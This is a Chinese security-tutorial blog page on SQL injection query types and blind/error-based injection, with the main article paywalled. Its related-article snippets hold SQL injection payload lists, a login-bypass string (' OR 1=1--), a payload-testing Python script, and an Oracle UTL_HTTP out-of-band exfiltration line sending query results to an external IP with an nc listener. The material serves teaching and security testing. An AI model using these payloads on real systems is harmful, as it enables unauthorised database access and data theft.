小迪安全16 web漏洞,SQL注入之查询方式及报错盲注

最新推荐文章于 2024-06-11 16:45:11 发布
最新推荐文章于 2024-06-11 16:45:11 发布
阅读量2.4k 收藏
点赞数
分类专栏: 2020小迪安全 文章标签: sql 安全 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46116117/article/details/122148409
版权

16 web漏洞,SQL注入之查询方式及报错盲注

​ 当进行 SQL 注入时,有很多注入会出现无回显的情况,其中不回显 的原因可能是 SQL 语句查询方式的问题导致,这个时候我们需要用到相 关的报错或盲注进行后续操作,同时作为手工注入时,提前了解或预知其 SQL 语句大概写法也能更好的选择对应的注入语句

img

常用sql语句

select 查询数据

在网站应用中进行数据显示查询效果

例: select * from news wher id=$id

insert 插入数据

在网站应用中进行用户注册添加等操作

例:insert into news(id,url,text) values(2,‘x’,’$t’)

delete 删除数据

后台管理里面删除文章删除用户等操作

例:delete from news where id=$id

update 更新数据

会员或后台中心数据同步或缓存等操作

例:update user set pwd=’$p’ where id=2 and username=‘admin’

order by 排列数据

一般结合表名或列名进行数据排序操作

例:select * from news order by $id

例:select id,name,price from news order by $order

重点理解:

我们可以通过以上查询方式与网站应用的关系

注入点产生地方或应用猜测到对方的SQL查询方式

例如:

请添加图片描述

注册页面,则为插入数据库的操作

请添加图片描述

select查询方式的注入

需要闭合单引号

请添加图片描述

insert注入

语句不同,注入的写法不同

SQL注入—盲注

盲注就是在注入过程中,获取的数据不能回显至前端页面。此时,我们需要利用一些方法进行半段或者尝试

最低0.47元/天 解锁文章
黑小薛
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web安全渗透测试十大常规项(一):web渗透测试之MySQL注入
HACKONE的博客
03-12 1369
渗透测试之SQL注入基础SQL注入类型按照数据类型类型来分类按照执行效果来分类(页面回显效果)按照数据提交的方式来分类判断注入类型的方法MySQL注入基础联合查询注入布尔注入时间注入注入宽字节注入二次注入偏移注入DNSlog注入注入webshellSQL注入绕过空格绕过(过滤空过)关键字过滤SQL注入绕WAF SQL注入类型 按照数据类型类型来分类 数字型注入点 在 Web 端大概是 http://xxx.com/news.php?id=1 这种形式,其注入点 id 类型为数字,所以叫数字型
sql注入详解
m0_67392811的博客
06-12 5658
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)注入基于布尔的基于时间的HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
基于时间差SQL
苏莫
08-24 620
说明 目标数据库类型: MySQL 数据库:world 表:city 列:ID Name CountryCode District Population 时间时,涉及的函数 sleep(arg) 返回字符串的第一个字符的 ASCII 码 mid(s,n,len) 从字符串 s 的 n 位置截取长度为 len 的子字符串 length(s) 返回字符串 s 的字符数 if(exp...
数据库mysql锁测试(间隙锁、临键锁)
weixin_43931625的博客
11-20 1688
数据库mysql 锁测试 数据库mysql 在可重复读、序列化隔离级别下使用的是间隙锁或者临键锁(间隙锁+行锁) 加锁规则:(隔离级别可重复、序列化) 主键索引或者唯一索引查询具体的值(如a=“value”)且value值存在时,可只加行锁,若不存在需要加间隙锁; 主键索引或者唯一索引进行范围查询(如a>"value")时,需要加间隙锁或者临键锁; 非唯一索引需要在可重...
小程序一直有问题,哪位大神帮忙看看
wangwenzhe的博客
10-28 252
小程序问题
sql注入payload
专注企业信息安全-sec
04-12 3861
分享一些平时测试用的sql payloads 1:BOOL SQLINJECTION \ ' " %df' %df" and 1=1 and 1=2 ' and '1'='1 ' and '1'='2 " and "1"="1 " and "1"="2 ) and (1=1 ) and (1=2 ') and ('1'='1 ') and ('1'='2 %' and 1=1 and '%'...
安全第14天 web漏洞SQL注入之类型及提交注入
qq_46116117的博客
12-14 1534
14 web漏洞SQL注入之类型及提交注入 ​ 在真实 SQL 注入安全测试中,我们一定要先明确提交数据及提交方法后再进行注入,其中提交数据类型和提交方法可以通过抓包分析获取, 后续安全测试中我们也必须满足同等的操作才能进行注入。 简要明确参数类型 数字,字符,搜索性,json等 数字型参数 字符型参数 如果字符型参数未加单引号,则会 字符型参数注入需要将单引号闭合 如: select * from users where name = 'xihua and 1=1' select * fr
第16天:WEB漏洞-SQL注入查询方式1
08-03
Access 偏移注入:解决列名获取不到的情况查看登陆框源代码的表单值或观察 URL 特征等也可以针对表或列获取不到的情况select 查询数据在网站应用中进行
sql注入 自学笔记 注入 二阶注入 布尔时间 基于sqli-labs
02-19
SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过构造特定的SQL语句来获取敏感信息或控制数据库。下面是基于SQLi-Labs的SQL注入基础知识点: 一、注入 注入是指攻击者通过构造特定的SQL语句,让...
05-浅谈企业SQL注入漏洞的危害与防御1
08-03
SQL注入是一种长期存在的网络安全威胁,尤其在企业环境中,它的危害性不容忽视。SQL注入攻击主要通过利用不安全的编程或配置,使得攻击者能够在应用程序执行的SQL语句中插入恶意代码,从而对数据库进行非法操作,...
sql注入的思维导图。
04-19
SQL注入是一种常见的Web应用程序安全漏洞, attackers可以通过在Web应用程序的输入字段中Inject恶意的SQL代码来访问、修改或控制数据库中的数据。本文将对SQL注入的思维导图进行详细的讲解,并对相关的知识点进行...
[0day]通达 OA v11.7 后台 SQL 注入到 RCE1
08-03
这种漏洞通常发生在 Web 应用程序中,攻击者可以通过用户输入、cookie 等方式,inject恶意 SQL 代码,从而获取数据库权限。 在通达 OA v11.7 版本中,攻击者可以通过构造特殊的 SQL 语句,绕过安全机制,获取数据库...
使用select实现sleep函数的功能
weixin_39035140的博客
01-27 2301
一、sleep和select到底哪个好 近期在阅读公司源码过程中发现了用select实现的sleep函数,经过思索和查阅相关资料,有了一定的了解, 1、首先两者都可以实现延时的效果,但是sleep延时的时间精确度上不高,因为设计CPU的调度算法、线程进程优先级,如果说对于时间上没有精确的要求,感觉sleep要笔记方便,就一行代码省事,无伤大雅。 2、也有人说sleep浪费CPU,使程序阻塞,如果说计算机资源本身就很紧缺,考虑系统的运行的效率、甚至网络传输速度,最好采用select。可以查看这个人的博客,相对
SQL注入Playload List
qq_52014772的博客
07-22 1099
SQL注入是一个网络安全漏洞,它使攻击者能够干扰应用程序对其数据库的查询SQL注入类型 类型 描述 In-band SQLi (Classic SQLi) In-band SQLi注入SQL注入攻击中最常见和最容易利用的。当攻击者能够使用相同的查询发起攻击并收集结果时,就会发生In-band SQLi注入。In-band SQLi注入的两种最常见类型是基于误的SQLi和基于联合的SQLi。 Error-based SQLi 基于误的SQLi是一种In-band..
【小安全】Day16web漏洞-SQL注入
qq_44312640的博客
11-02 182
本文介绍了SQL注入方法。方法主要是用在前端页面不回显sql语句内容的时候,如册等。
安全技术 | 一次众测实战sql注入绕过
Jeeseen123的博客
12-22 1765
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。本文由锦行科技的安全研究团队提供,旨在帮助客户理解sql注入绕过的问题。 测试背景 在一次测试过程中,发现登陆框的用户名处存在延时注入。 开启bp抓包,随便输入用户名和密码,点击登陆,抓到以下数据包 经测试,Uname参数存在sql延时注入 在后
sql注入之页面不能回显(外带,Oracle)
weixin_42478365的博客
09-29 904
很多时候页面不能直接回显,如果是oracle数据库可以用UTL_HTTP将数据反弹到一个外网IP进行查看,具体步骤,如下: 第一步:使用nc监听数据 nc -lvvp 8888 第二步:反弹数据信息 and UTL_HTTP("http://IP:8888/" || (SQL语句))=1-- 判断是否存在UTL_HTTP select count(*) from all_objects where object_name="UTL_HTTP" ...
SQL: 将一个表中查出来数据插入到另一个表中
最新发布
我的博客
06-11 1387
SQL: 将一个表中查出来数据插入到另一个表中 insert into A(a,b,c) (select a,b,c from B) 2、假如A表不存在 select a,b,c into A from B 3、假如需要跨数据库 insert into ADB.[dbo].A(a,b,c) (select a,b,c from BDB.[dbo].B)
sql注入(附自动化脚本)
05-22
SQL注入是一种常见的网络攻击方式,通过在输入框中注入SQL语句,攻击者可以获取数据库中的敏感信息,包括用户名、密码等。注入是一种SQL注入方式,它利用了数据库返回误信息的特性,通过构造特定的SQL语句来达到获取信息的目的。 以下是一个简单的注入示例: 假设有一个登录页面,用户需要输入用户名和密码才能登录。页面的代码如下: ``` <?php $conn = mysqli_connect("localhost", "root", "", "mydb"); if (isset($_POST['submit'])) { $username = $_POST['username']; $password = $_POST['password']; $sql = "SELECT * FROM users WHERE username='$username' AND password='$password'"; $result = mysqli_query($conn, $sql); if (mysqli_num_rows($result) > 0) { echo "登录成功"; } else { echo "用户名或密码误"; } } ?> <form method="POST"> 用户名:<input type="text" name="username"><br> 密码:<input type="password" name="password"><br> <input type="submit" name="submit" value="登录"> </form> ``` 攻击者可以通过在输入框中注入SQL语句来获取数据库中的信息。例如,输入`' OR 1=1--`作为用户名,`' OR 1=1--`作为密码,即可绕过登录验证,因为`OR 1=1`会使整个SQL语句始终成立,从而返回所有用户的信息。 如果服务器没有开启信息,攻击者还可以通过构造特定的SQL语句,使服务器返回误信息,从而获取数据库中的信息。例如,输入`' UNION SELECT 1,2,3--`作为用户名,任意密码,即可触发误信息,因为`UNION SELECT`语句要求两个SELECT语句的列数必须相同,而这里只有一个SELECT语句,因此会导致误。 以下是一个自动化脚本示例,用于检测一个网站是否存在注入漏洞: ``` import requests # 构造SQL语句,检测是否存在注入漏洞 def test_sqli(url, payload): headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3", "Cookie": "PHPSESSID=1234567890" } data = { "username": payload, "password": "123456" } try: r = requests.post(url, headers=headers, data=data, timeout=5) if "Warning" in r.text: print("[+] 存在注入漏洞:" + payload) except: pass # 读取字典文件,逐个测试 def main(): url = "http://example.com/index.php" with open("dict.txt", "r") as f: for line in f: payload = line.strip() test_sqli(url, payload) if __name__ == '__main__': main() ``` 该脚本会读取一个字典文件,逐个测试其中的payload,如果存在注入漏洞,则会输出相应的payload。需要意的是,该脚本只能检测是否存在注入漏洞,不能获取具体的数据库信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值